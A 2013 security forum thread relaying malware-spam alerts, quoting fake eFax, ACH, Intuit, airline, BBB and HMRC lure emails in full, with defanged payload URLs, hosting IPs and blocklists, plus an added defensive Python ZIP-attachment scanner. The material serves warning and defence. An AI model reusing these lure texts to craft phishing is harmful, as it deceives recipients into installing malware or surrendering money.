110.143.183.104, 24.120.165.58, 110.143.183.104, 75.80.49.248, 71.42.56.253, 94.65.0.48,
98.16.107.213, 190.198.30.168, 76.193.173.205, 71.43.217.3, 66.229.110.89, 101.162.73.132,
94.68.49.208, 64.219.121.189, 99.122.152.158, 80.252.59.142, 108.211.64.46, 69.39.74.6,
91.99.146.167, 187.131.70.221, 76.202.211.184, 168.93.99.82, 122.60.136.168, 213.105.24.171,
122.60.136.168, 84.72.243.231, 79.56.80.211 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/856eea6c46708690bd2bafe3278f00d203b7bdab6d8f13ee988bd5b51b9b3dd9/analysis/
File name: info.exe
Detection ratio: 25/46
Analysis date: 2013-02-21
___
Fake "Efax Corporate" SPAM / fuigadosi .ru
- http://blog.dynamoo.com/2013/02/efax-corporate-spam-fuigadosiru.html
21 Feb 2013 - "This fake eFax spam leads to malware on fuigadosi .ru:
Date: Thu, 21 Feb 2013 -05:24:35 -0800
From: LinkedIn Password [password @linkedin .com]
Subject: Efax Corporate
Attachments: EFAX_Corporate.htm
Fax Message [Caller-ID: 705646877]
You have received a 29 pages fax at Thu, 21 Feb 2013 -05:24:35 -0800, (913)-809-4198.
* The reference number for this fax is [eFAX-806896385].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The malicious payload is at [donotclick]fuigadosi .ru:8080/forum/links/column.php (report here*) hosted on:
84.23.66.74 (EUserv Internet, Germany)
122.160.168.219 (Trackon Couriers, India)
210.71.250.131 (Chungwa Telecom, China)..."
* http://urlquery.net/report.php?id=1060334
___
Fake Trustwave TrustKeeper emails - Phish ...
- http://blog.spiderlabs.com/2013/02/-trustwave-trustkeeper-pci-scan-notification-phishing-alert.html
21 Feb 2013 - "Over the last few hours, Trustwave has received multiple reports of individuals receiving fake emails pretending to be from Trustwave. These emails did not originate from Trustwave. Recipients should immediately delete the emails and not follow any links presented in them. These emails indicate they are being sent as part of a “TrustKeeper PCI Scan Notification” and are alerting the recipient to login to a portal to respond to an issue related to a vulnerability scan of their network. Early analysis has shown these emails are being sent from many variations of fake Trustwave email addresses and redirecting users to multiple non-Trustwave URLs. Visiting these URLs might introduce malware onto your systems. Below is a screenshot of a fake email:
> http://npercoco.typepad.com/.a/6a0133f264aa62970b017d41337399970c-pi ..."
___
Fake inTuit emails - overdue payment
- http://security.intuit.com/alert.php?a=73
2/21/13 - "People are receiving fake emails with the title "Please respond - overdue payment." Below is a copy of the email people are receiving. The email does not contain a link; however, the email has a .zip attachment that contains malware. Do not open the .zip file:
Please find attached your invoices for the past months. Remit the payment by 02/25/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Earline Robles
This is the end of the fake email.
Steps to Take Now: Do -not- open the attachment in the email..."
___
Fake "Xerox WorkCentre Pro" SPAM / familanar .ru
- http://blog.dynamoo.com/2013/02/scan-from-xerox-workcentre-pro-spam.html
21 Feb 2013 - "This familiar printer spam leads to malware on the familanar .ru domain:
Date: Thu, 21 Feb 2013 09:22:25 -0500 [09:22:25 EST]
From: Tagged [Tagged @taggedmail .com]
Subject: Fwd: Re: Scan from a Xerox WorkCentre Pro #800304
A Document was sent to you using a XEROX WorkJet PRO 760820.
SENT BY : BRYNN
IMAGES : 5
FORMAT (.JPEG) DOWNLOAD
The malicious payload is at [donotclick]familanar .ru:8080/forum/links/column.php (report here*) hosted on:
84.23.66.74 (EUserv Internet, Germany)
122.160.168.219 (Trackon Couriers, India)
210.71.250.131 (Chungwa Telecom, China)
Which are the same IPs found in this attack** and several others. Block 'em if you can."
* http://www.urlquery.net/report.php?id=1064138
** http://blog.dynamoo.com/2013/02/efax-corporate-spam-fuigadosiru.html
___
Fake ACH transaction SPAM / payment receipt - 884993762994.zip
- http://blog.dynamoo.com/2013/02/ach-transaction-spam.html
21 Feb 2013 - "This fake ACH transaction spam comes with a malicious attachment:
Date: Thu, 21 Feb 2013 14:32:08 -0500 [14:32:08 EST]
From: Payment notification system [homebodiesga38@gmail.com]
Subject: Automatic transfer notification
ACH transaction is completed. $443 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt on payment is attached.
This is an automatically generated email, please do not reply
Attached is a file called payment receipt - 884993762994.zip which unzips to payment receipt - 884993762994.exe which has a disappointing VirusTotal detection count of just 14/46... Blocking EXE-in-ZIP files at the perimeter generally causes very little trouble, assuming you can do it.."
:fear::mad:
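Added example (not from the dynamoo posts or the forum poster): a Python script that does what the perimeter advice above describes, opening a ZIP attachment in memory and walking nested archives so that both the double-zipped USPS "delivery failure report" and the EXE-in-ZIP ACH "payment receipt" get flagged by file magic rather than by file name alone. The sample archives and the fake "MZ" stub inside them are constructed in the script itself (the member names are borrowed from the USPS post); nothing is fetched or written to disk.

```python
"""Recursively inspect a ZIP attachment for EXE-in-ZIP and double-zipped payloads.

Added example, not code from the dynamoo posts quoted above. Standard library
only; it checks file magic rather than trusting member names, so a ".pdf"
that starts with "MZ" is still caught. The sample archives are constructed
here, in memory; the .exe is a fake "MZ" stub, not real malware.
"""
import io
import zipfile
from dataclasses import dataclass
from typing import List

EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}


@dataclass
class Finding:
    path: str        # member path; nested archives are joined with " -> "
    depth: int       # 0 = member of the outer ZIP, 1 = inside a nested ZIP, ...
    size: int        # uncompressed size as declared in the archive
    is_pe: bool      # content starts with the DOS/PE "MZ" magic
    is_zip: bool     # content starts with the local-file-header magic "PK\x03\x04"
    exec_ext: bool   # name ends in an extension Windows will execute
    encrypted: bool  # member could not be read without a password


def _extension(name: str) -> str:
    name = name.rsplit("/", 1)[-1].lower()
    return name[name.rfind("."):] if "." in name else ""


def inspect_zip(data: bytes, prefix: str = "", depth: int = 0,
                max_depth: int = 3, max_members: int = 200) -> List[Finding]:
    """Return one Finding per file member, recursing into nested ZIPs up to max_depth."""
    findings: List[Finding] = []
    if depth > max_depth:
        return findings  # refuse to follow deeper nesting (zip-bomb / evasion guard)
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a ZIP at all; nothing to report from this layer
    with zf:
        for info in zf.infolist()[:max_members]:
            if info.is_dir():
                continue
            path = f"{prefix}{info.filename}"
            try:
                content = zf.read(info)
                encrypted = False
            except RuntimeError:  # zipfile raises this for password-protected members
                content, encrypted = b"", True
            head = content[:4]
            f = Finding(path=path, depth=depth, size=info.file_size,
                        is_pe=head.startswith(b"MZ"),
                        is_zip=head.startswith(b"PK\x03\x04"),
                        exec_ext=_extension(info.filename) in EXEC_EXTENSIONS,
                        encrypted=encrypted)
            findings.append(f)
            if f.is_zip:  # double-zipped: descend into the inner archive
                findings.extend(inspect_zip(content, prefix=f"{path} -> ",
                                            depth=depth + 1, max_depth=max_depth,
                                            max_members=max_members))
    return findings


def should_block(findings: List[Finding]) -> bool:
    """Perimeter policy: block PE content, executable names, encrypted members, nested ZIPs."""
    return any(f.is_pe or f.exec_ext or f.encrypted or f.is_zip for f in findings)


def build_double_zipped_sample() -> bytes:
    """Constructed stand-in for the USPS lure: outer ZIP -> inner ZIP -> fake .exe."""
    fake_pe = b"MZ" + b"\x00" * 58 + b"\x40\x00\x00\x00" + b"PE\x00\x00" + b"\x00" * 32
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("USPS report id 943577924988734.exe", fake_pe)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("USPS report id 943577924988734.zip", inner.getvalue())
    return outer.getvalue()


def build_benign_sample() -> bytes:
    """Constructed benign attachment: a ZIP holding a small PDF-like document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("invoice.pdf", b"%PDF-1.4\n% constructed sample\n%%EOF\n")
    return buf.getvalue()


if __name__ == "__main__":
    findings = inspect_zip(build_double_zipped_sample())
    for f in findings:
        print(f)
    print("block:", should_block(findings))
```

Run it as a script to print the findings for the constructed sample; in a mail gateway, feed the attachment bytes to inspect_zip() and let should_block() decide. Encrypted members count as blockable because the scanner cannot see inside them, and nesting is capped so a crafted archive cannot lead the scanner arbitrarily deep.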
AplusWebMaster
2013-02-22, 18:32
FYI...
Fake Invoice SPAM - "End of Aug. Stat" forummersedec .ru
- http://blog.dynamoo.com/2013/02/end-of-aug-stat-spam-forummersedecru.html
22 Feb 2013 - "This fake invoice email leads to malware on forummersedec .ru:
Date: Fri, 22 Feb 2013 11:33:38 +0530
From: AlissonNistler@ [victimdomain]
Subject: Re: FW: End of Aug. Stat.
Attachments: Invoices-1207-2012.htm
Hallo,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer/Mozilla Firefox file)
Regards
The attachment attempts to redirect the victim to a malicious payload at [donotclick]forummersedec .ru:8080/forum/links/column.php (report here*) hosted on
84.23.66.74 (EUserv Internet, Germany)
122.160.168.219 (Trackon Couriers, India)
The following IPs and domains are related and should be blocked:
84.23.66.74
122.160.168.219...
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1069702
___
Fake "Data Processing" SPAM / dekolink .net
- http://blog.dynamoo.com/2013/02/data-processing-spam-dekolinknet.html
22 Feb 2013 - "This fake "Data Processing" spam leads to malware on dekolink .net:
Date: Fri, 22 Feb 2013 08:06:43 -0500
From: "Data Processing Service" [customersupport @dataprocessingservice .com]
Subject: ACH file ID '768.579
Files Processing Service
SUCCESS Note
We have successfully handled ACH file 'ACH2013-02-20-5.txt' (id '768.579') submitted by user '[redacted]' on '2013-02-20 1:14:30.7'.
FILE SUMMARY:
Item count: 79
Total debits: $28,544.53
Total credits: $28,544.53
For more info click here
The malicious payload is at [donotclick]dekolink .net/detects/when-weird-contrast.php (report here*) hosted on the following servers:
50.7.251.59 (FDC Servers, Czech Republic)
176.120.38.238 (Langate, Ukraine).."
* http://urlquery.net/report.php?id=1062564
... BlackHole v2.0 exploit kit
___
Fake LinkedIn SPAM / greatfallsma .com
- http://blog.dynamoo.com/2013/02/linkedin-spam-greatfallsmacom.html
22 Feb 2013 - "This "accidental" LinkedIn spam is a fake and leads to malware on greatfallsma .com:
From: LinkedIn [mailto:papersv@ informer.linkedin .com]
Sent: 22 February 2013 15:58
Subject: Reminder about link requests pending
See who connected with you this week on LinkedIn
Now it's easy to connect with people you email
Continue
This is an accidental LinkedIn Marketing email to help you get the most out of LinkedIn. Unsubscribe
© 2013, LinkedIn Corporation. 2089 Stierlin Ct, Mountain View, CA 99063
> Another example:
Date: Fri, 22 Feb 2013 18:21:25 +0200
From: "LinkedIn" [noblest00@ info.linkedin .com]
Subject: Reminder about link requests pending
[redacted]
See who requested link with you on LinkedIn
Now it's easy to connect with people you email
Continue
This is an casual LinkedIn Marketing email to help you get the most out of LinkedIn. Unsubscribe
2013, LinkedIn Corporation. 2073 Stierlin Ct, Mountain View, CA 98043
The malicious payload is at [donotclick]greatfallsma .com/detects/impossible_appearing_timing.php (report here*) hosted on:
50.7.251.59 (FDC Servers, Czech Republic)
176.120.38.238 (Langate, Ukraine)
These are the same two servers used in this attack; blocking them would probably be a good idea."
* http://urlquery.net/report.php?id=1071027
... Blackhole 2 Landing Page
:fear::mad:
AplusWebMaster
2013-02-25, 12:40
FYI...
Fake ACH emails serve client-side exploits and malware
- http://blog.webroot.com/2013/02/25/malicious-data-processing-service-ach-file-id-themed-emails-serve-client-side-exploits-and-malware/
Feb 25, 2013 - "... yet another spam campaign, this time impersonating the “Data Processing Service” company, in an attempt to trick its customers into interacting with the malicious emails. Once they do so, they are automatically exposed to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/fake_email_spam_exploits_malware_black_hole_exploit_kit_data_processing_service_ach.png
... Upon successful client-side exploitation, the campaign drops MD5: faa3a6c7bbf5b0449f60409c8bf63859 * ... Trojan-Spy.Win32.Zbot.jfpy.
... It then attempts to connect to the following IPs:
24.120.165.58, 66.117.77.134, 64.219.121.189, 66.117.77.134, 75.47.231.138, 108.211.64.46,
91.99.146.167, 108.211.64.46, 71.43.217.3, 81.136.230.235, 101.162.73.132, 99.76.3.38,
85.29.177.249, 24.126.54.116, 108.130.34.42, 99.116.134.54, 80.252.59.142
Malicious domain name reconnaissance:
dekolink .net – 50.7.251.59; 176.120.38.238 – Email: wondermitch @hotmail .com
Name Server: NS1.THEREGISTARS .COM – 31.170.106.17 – Email: lockwr @rocketmail .com
Name Server: NS2.THEREGISTARS .COM – 67.15.223.219 – Email: lockwr @rocketmail .com ..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/en/file/1313dd0cb96b45cea83e3d3c641058205bec547eb50080cbed6eeaee7968ca62/analysis/
File name: info.exe
Detection ratio: 27/45
Analysis date: 2013-02-25
___
Trustwave Trustkeeper Phish
- https://isc.sans.edu/diary.html?storyid=15271
Last Updated: 2013-02-25 17:41:36 UTC - ... the giveaway that this is a fake is the from e-mail address as well as the link leading to a different site than advertised. Click on the image for a full size example.
> https://isc.sans.edu/diaryimages/images/trustwavephish.png
[Update:] An analysis of this phish by Trustwave's own Spiderlabs can be found here:
- http://blog.spiderlabs.com/2013/02/more-on-the-trustkeeper-phish.html
- http://blog.dynamoo.com/2013/02/trustkeeper-vulnerabilities-scan.html
25 Feb 2013 - "... this "TrustKeeper Vulnerabilities Scan Information" -spam- leads to an exploit kit on saberdelvino .net...
> https://lh3.ggpht.com/-Gyic2-WNNZE/USu7TzQllfI/AAAAAAAAA9w/y_R4ahAMgrY/s1600/trustwave.png
... The malicious payload is at [donotclick]saberdelvino .net/detects/random-ship-members-daily.php (report here*) hosted on the following IPs:
118.97.77.122 (PT Telekon, Indonesia)
176.120.38.238 (Langate, Ukraine)..."
* http://www.urlquery.net/report.php?id=1120754
... Blackhole 2
:fear::mad:
AplusWebMaster
2013-02-26, 22:32
FYI...
Fake Facebook SPAM / lazaro-sosa .com
- http://blog.dynamoo.com/2013/02/facebook-spam-lazaro-sosacom.html
26 Feb 2013 - "This fake Facebook spam leads to malware on lazaro-sosa .com:
Date: Tue, 26 Feb 2013 14:26:20 +0200
From: "Facebook" [twiddlingv29@informer.facebook.com]
Subject: Brian Parker commented your photo.
facebook
Brian Parker commented on Your photo.
Reply to this email to comment on this photo.
See Comment
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please unsubscribe.
Facebook, Inc., Attention: Department 415, PO Box 10001, Palo Alto, CA 90307
The malicious payload is at [donotclick]lazaro-sosa .com/detects/queue-breaks-many_suffering.php (report here*) hosted on:
118.97.77.122 (PT Telkom, Indonesia)
147.91.83.31 (AMRES, Serbia)
Blocking these IPs is probably prudent."
* http://www.urlquery.net/report.php?id=1135254
... Blackhole
___
Fake Intuit SPAM / forumligandaz .ru
- http://blog.dynamoo.com/2013/02/intuit-spam-forumligandazru.html
26 Feb 2013 - "This fake Intuit spam leads to malware on forumligandaz .ru:
Date: Tue, 26 Feb 2013 01:27:09 +0330
From: "Classmates . com" [classmatesemail@accounts.classmates.com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Tue, 26 Feb 2013 01:27:09 +0330.
Finances would be gone away from below account # ending in 8733 on Tue, 26 Feb 2013 01:27:09 +0330
amount to be seceded: 3373 USD
Paychecks would be procrastinated to your personnel accounts on: Tue, 26 Feb 2013 01:27:09 +0330
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]forumligandaz .ru:8080/forum/links/column.php hosted on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
31.200.240.153
83.169.41.58 ..."
(More detail at the dynamoo URL above.)
:mad::fear:
AplusWebMaster
2013-02-27, 21:41
FYI...
Fake US Airways SPAM / berrybots .net
- http://blog.dynamoo.com/2013/02/us-airways-spam-berrybotsnet.html
27 Feb 2013 - "... fake US Airways spam leads to malware on berrybots .net:
Date: Wed, 27 Feb 2013 08:09:36 -0500 [08:09:36 EST]
From: bursarp1 @email-usairways .com
Subject: Your US Airways trip...
> http://images.usairways.com/newEmail/gen3/templates/header_630px_yrs.gif
Confirmation code: B339AO
Date issued: Tuesday, February 26, 2013
Barcode
[redacted]
Scan at any US Airways kiosk to check in
Passenger summary
Passenger name
Frequent flyer # (Airline)
Ticket number
Special needs
Angel Morris 40614552582 (US) 22401837506661
Robert White 12938253579871
Fly details Download to Outlook
Depart: Philadelphia, PA (PHL) Chicago, IL (O'Hare) (ORD)...
(More detail at the dynamoo URL above.)
Picture version (click to enlarge):
> http://blog.dynamoo.com/2013/02/us-airways-spam-berrybotsnet.html
The malicious payload is at [donotclick]berrybots .net/detects/circulation-comparatively.php (report here*) hosted on:
118.97.77.122 (PT Telkon, Jakarta)
147.91.83.31 (AMRES, Serbia)
195.88.139.78 (Neiron Systems, Ukraine)
Recommended blocklist:
118.97.77.122
147.91.83.31
195.88.139.78
greatfallsma .com
lazaro-sosa .com
yoga-thegame .net
dekolink .net
saberdelvino .net
berrybots .net ..."
* http://www.urlquery.net/report.php?id=1168427
... Blackhole Java applet with obfuscated URL
... 147.91.83.31 Blackhole 2 Landing Page
___
Fake Invoice-themed SPAM / forumusaaa .ru
- http://blog.dynamoo.com/2013/02/end-of-aug-statement-spam-forumusaaaru.html
27 Feb 2013 - "This invoice-themed spam leads to malware on forumusaaa .ru:
Date: Thu, 28 Feb 2013 06:04:08 +0530
From: "Lisa HAGEN" [WilsonVenditti @ykm .com .tr]
Subject: Re: FW: End of Aug. Statement
Attachments: Invoice_JAN-2966.htm
Good day,
as reqeusted I give you inovices issued to you per jan. (Microsoft Internet Explorer).
Regards
Lisa HAGEN
The malware is hosted at [donotclick]forumusaaa .ru:8080/forum/links/column.php (report here*) hosted on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
31.200.240.153
83.169.41.58..."
(More listed at the dynamoo URL above.)
* http://www.urlquery.net/report.php?id=1170276
... suspicious URL pattern
... 31.200.240.153 Blackhole 2 Landing Page
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Payment Advice Notification E-mail Messages - February 27, 2013
Fake Overdue Payment Notification E-mail Messages - February 27, 2013
Fake Bank Account Update E-mail Messages - February 27, 2013
Fake Product Order E-mail Messages - February 27, 2013
Fake Product Order Quotation Attachment E-mail - February 27, 2013
Fake Wire Transfer Notification E-mail Messages - February 27, 2013
Fake Invoice Statement Attachment E-mail Messages - February 27, 2013
Fake Bank Account Statement Notification E-mail Messages - February 27, 2013
Fake Quotation Attachment E-mail Messages - February 27, 2013
(Links and more info at the cisco URL above.)
:mad:
AplusWebMaster
2013-02-28, 14:35
FYI...
"Follow this link" SPAM / sidesgenealogist .org
- http://blog.dynamoo.com/2013/02/follow-this-link-spam.html
28 Feb 2013 - "This rather terse spam appears to lead to an exploit kit on sidesgenealogist .org:
From: Josefina Underwood [mailto:hdFQe @heathrowexpress .com]
Sent: 27 February 2013 16:43
Subject: Follow this link
I have found it http ://www.eurosaudi .com/templates/beez/wps.php?v20120226
Sincerely yours,
Sara Walton
The link is to a legitimate hacked site, and in this case it attempts to bounce to [donotclick]sidesgenealogist .org/closest/c93jfi2jf92ifj39ugh2jfo3g.php but at the time of writing the malware site appears to be overloaded. However, we can find an earlier report for the same server here* that indicates an exploit kit. The malware is hosted on 188.93.210.226 (Logol.ru, Russia**). I would recommend blocking the entire 188.93.210.0/23 range to be on the safe side. These other two domains are in the same AS and are currently active:
reinstalltwomonthold .org
nephewremovalonly .org
scriptselse .org
everflowinggopayment .net "
* http://urlquery.net/report.php?id=1180853
... Blackholev2 url structure detected... Multiple Exploit Kit Payload detection
** https://www.google.com/safebrowsing/diagnostic?site=AS:49352
___
Fake "Contract" SPAM / forumny .ru
- http://blog.dynamoo.com/2013/02/contract-of-09072011-spam-forumnyru.html
28 Feb 2013 - "This contracts-themed spam leads to malware on forumny .ru:
Date: Thu, 28 Feb 2013 11:43:15 +0400
From: "LiveJournal.com" [do-not-reply @livejournal .com]
Subject: Fw: Contract of 09.07.2011
Attachments: Contract_Scan_IM0826.htm
Dear Sirs,
In the attached file I am forwarding you the Translation of the Loan Contract that I have just received a minute ago. I am really sorry for the delay.
Best regards,
SHERLENE DARBY, secretary
The -attachment- Contract_Scan_IM0826.htm leads to malware on [donotclick]forumny .ru:8080/forum/links/column.php (report here*) on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
31.200.240.153
83.169.41.58 ..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1183959
... suspicious URL pattern
... 31.200.240.153 Blackhole 2 Landing Page
___
Fake job offer
- http://blog.dynamoo.com/2013/02/usanewworkcom-fake-job-offer.html
28 Feb 2013 - "This fake job offer will be some illegal activity such as money laundering or reshipping stolen goods:
Date: Thu, 28 Feb 2013 14:57:55 -0600
From: andrzej.wojnarowski@[victimdomain]
Subject: There is a vacancy of a Regional manager in USA:
If you have excellent administrative skills, working knowledge of Microsoft Office,
a keen eye for detail, well-versed in the use of social networking sites such as Twitter and Facebook,
are organized, present yourself well and are a team player with the ability to work independently,
are reliable and punctual and can understand and execute instructions are determined to work hard and succeed - we need you.
If you are interested in this job, please, send us your contact information:
Full name:
Country:
City:
E-mail:
Please email us for details: Paulette @usanewwork .com
In this case the email originated from 187.246.25.58, a Mega Cable customer in Guadalajara, Mexico. The domain is registered to an address that does not exist (there is no Pratt Avenue in Tukwila):
Sarah Shepard info @usanewwork .com
360-860-3630 fax: 360-860-3321
4478 Pratt Avenue
Tukwila WA 98168
us
The domain was only registered two days ago on 28/2/13. The nameservers ns1.stageportal .net and ns2.stageportal .net are shared by several other domains offering similar fake jobs...
IP addresses involved are:
5.135.90.19 (OVH, France)
69.169.90.62 (Big Brain Host, US)
199.96.86.139 (Microglobe LLC, US)
This job offer is best avoided unless you like prison food..."
(More detail at the dynamoo URL above.)
___
Fake BBB SPAM / forumnywrk .ru
- http://blog.dynamoo.com/2013/02/bbb-spam-forumnywrkru.html
28 Feb 2013 - "This fake BBB Spam leads to malware on forumnywrk .ru:
Date: Thu, 28 Feb 2013 07:29:10 -0500 [07:29:10 EST]
From: LinkedIn Password [password @linkedin .com]
Subject: Urgent information from BBB
Attn: Owner/Manager
Here with the Better Business Bureau notifies you that we have received a complaint (ID 832708632)
from one of your customers with respect to their dealership with you.
Please open the COMPLAINT REPORT below to obtain more information on this matter and let us know of your point of view as soon as possible.
We are looking forward to your prompt reply.
Regards,
VERSIE Stringer
The malicious payload is on [donotclick]forumnywrk .ru:8080/forum/links/column.php hosted on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
83.169.41.58
31.200.240.153 ..."
(More detail at the dynamoo URL above.)
:mad:
AplusWebMaster
2013-03-01, 17:51
FYI...
Casino-themed Blackhole sites
- http://blog.dynamoo.com/2013/03/casino-themed-blackhole-sites.html
1 March 2013 - "Here's a couple of URLs that look suspiciously like a BlackHole Exploit kit, hosted on 130.185.105.74:
[donotclick]888casino-luckystar .net/discussing/sizes_agreed.php
[donotclick]555slotsportal .org/discussing/alternative_distance.php
[donotclick]555slotsportal .net/shrift.php
[donotclick]555slotsportal .net/discussing/alternative_distance.php
[donotclick]555slotsportal .me/discussing/alternative_distance.php
[donotclick]sexstreamsmatez .biz/discussing/alternative_distance.php
You can find a sample report here*... there's nothing of value here and these sites are probably malicious and should be blocked. You might want to consider blocking 130.185.105.0/24 too..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1199381
... Detected BlackHole v2.0 exploit kit URL pattern
:mad::fear:
AplusWebMaster
2013-03-04, 19:14
FYI...
Fake Delta Airlines SPAM / inanimateweaknesses .net and complainpaywall .net
- http://blog.dynamoo.com/2013/03/delta-airlines-spam-inanimateweaknesses.html
4 March 2013 - "This fake Delta Airlines spam leads to malware on inanimateweaknesses .net and complainpaywall .net:
From: DELTA CONFIRMATION [mailto:cggQozvOc @sutaffu .co.jp]
Sent: 04 March 2013 14:27
Subject: Your Receipt and Itinerary
Thank you for choosing Delta. We encourage you to review this information before your trip.
If you need to contact Delta or check on your flight information, go to delta.com/itineraries
Now, managing your travel plans just got easier. You can exchange, reissue and refund electronic tickets at delta .com/itineraries.
Take control and make changes to your itineraries at delta.com/itineraries.
Speed through the airport. Check-in online for your flight.
Check-in
Flight Information
DELTA CONFIRMATION #: D0514B3
TICKET #: 00920195845933
Bkng Meals/ Seat/
Day Date Flight Status Class City Time Other Cabin
--- ----- --------------- ------ ----- ------------
Mon 11MAR DELTA 372 OK H LV NYC-KENNEDY 820P F 19C
AR SAN FRANCISCO 8211P COACH
Fri 15MAR DELTA 1721 OK H LV LOS ANGELES 1145P V 29A
AR NYC-KENNEDY 812A# COACH
Check your flight information online at delta.com/itineraries
The email contains several links to different hacked sites, which then forward to [donotclick]inanimateweaknesses .net/closest/c93jfi2jf92ifj39ugh2jfo3g.php (report here*) or [donotclick]complainpaywall .net/closest/c93jfi2jf92ifj39ugh2jfo3g.php (report here**) both of which are hosted on 188.93.211.156 (Logol.ru, Russia). In my opinion 188.93.210.0/23 is a bit of a sewer and should be blocked if you can, as there are probably many other malicious sites nearby.
Of note is that the links in the email only seem to work with a correct referrer and user agent. If those are not set, then you will not end up at the malware page."
* http://urlquery.net/report.php?id=1246850
... Detected BlackHole v2.0 exploit kit URL pattern ... Detected live BlackHole v2.0 exploit kit
** http://urlquery.net/report.php?id=1246854
... Detected BlackHole v2.0 exploit kit URL pattern ... Detected live BlackHole v2.0 exploit kit
___
Fake eFax SPAM / forumla .ru
- http://blog.dynamoo.com/2013/03/efax-spam-forumlaru.html
4 Mar 2013 - "This fake eFax spam leads to malware on forumla .ru:
Date: Mon, 4 Mar 2013 08:53:20 +0300
From: LinkedIn [welcome @linkedin .com]
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 646370000]
You have received a 57 pages fax at Mon, 4 Mar 2013 08:53:20 +0300, (213)-406-0113.
* The reference number for this fax is [eFAX-336705661].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The malicious payload is at [donotclick]forumla .ru:8080/forum/links/column.php (report here*) hosted on 210.71.250.131 (Chungwa Telecom, Taiwan). These other sites are also visible on the same IP:
..."
* http://urlquery.net/report.php?id=1247054
... Detected suspicious URL pattern... Detected live BlackHole v2.0 exploit kit
___
Fake dealerbid .co.uk SPAM
- http://blog.dynamoo.com/2013/03/dealerbidcouk-spam.html
4 March 2013 - "This -spam- uses an email address ONLY used to sign up for dealerbid .co.uk
From: HM Revenue & Customs [enroll @hmrc .gov.uk]
Date: 4 March 2013 13:37
Subject: HMRC Tax Refund ID: 3976244
Dear Taxpayer,
After the last annual calculations of your fiscal activity we have discovered that you are eligible to receive a tax refund of 377.50 GBP. Kindly complete the tax refund request and allow 2-3 working days to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline. Please click on the attached file in order to access the form for your tax refund.
Currently we are only able to process tax refunds through "LloydsTSB". Alternatively, you can wait for the next few weeks to apply for a full refund through additional financial institutions(Banks).
Kind regards,
Paul McWeeney
Head of Consumer Sales and Service
The email got horribly mangled on the way and luckily whatever payload came with it is buggered. Of interest though, the email originates from 78.136.27.79 which is home to the following websites:
everybodyonline .co.uk
uk-car-discount .co.uk
The email address has been -stolen- from one UK motoring related site, and the spam sent through the hacked server of another UK motoring site. That's a peculiar coincidence, although I do not believe that those site operators are responsible for this spam run. It looks like I am not the only person to notice this same problem*.."
* http://www.reviewcentre.com/Car-Dealers/Dealerbid-www-dealerbid-co-uk-review_1884815
___
Fake Justin Bieber social media claims
- http://www.hoax-slayer.com/bieber-dies-crash-hoax.shtml
March 4, 2013 - "Outline: Message circulating via social media claims that popular young singing star Justin Bieber has died in a car accident...
> http://www.hoax-slayer.com/images/bieber-crash-hoax.jpg
... Many of these false death rumours originate from several tasteless "prank" websites that allow users to create fake news stories detailing the supposed death of various celebrities. Users can generally pick from several "news" templates, add the name of their chosen celebrity and then attempt to fool their friends by sharing the -bogus- story..."
___
Fake Facebook email/SPAM 'Violation of Terms' - Phishing Scam
- http://www.hoax-slayer.com/facebook-page-phishing-scam.shtml
March 4, 2013 - "Outline: Inbox message purporting to be from "Mark Zurckerberg" claims that the user's Facebook Page has violated the Facebook Terms of Service and may be permanently deleted unless the account is verified by clicking a link in the message... There have been a number of variations of these Facebook account phishing scams distributed in recent years. If you receive any message that claims that your Facebook account may be disabled or deleted if you do not verify account details, do not click on any links or attachments that it may contain. It is always safest to login to your Facebook account - and other online accounts - by entering the address into your browser's address bar rather than by following a link."
:mad::fear:
AplusWebMaster
2013-03-05, 14:08
FYI...
New Java exploits centered exploit kit
- http://blog.webroot.com/2013/03/05/cybercriminals-release-new-java-exploits-centered-exploit-kit/
March 5, 2013 - "... its current version is entirely based on Java exploits (CVE-2012-1723 and CVE-2013-0431), naturally, with “more exploits to be introduced any time soon”... More details:
Sample screenshot of the statistics page of the newly released Web malware exploitation kit:
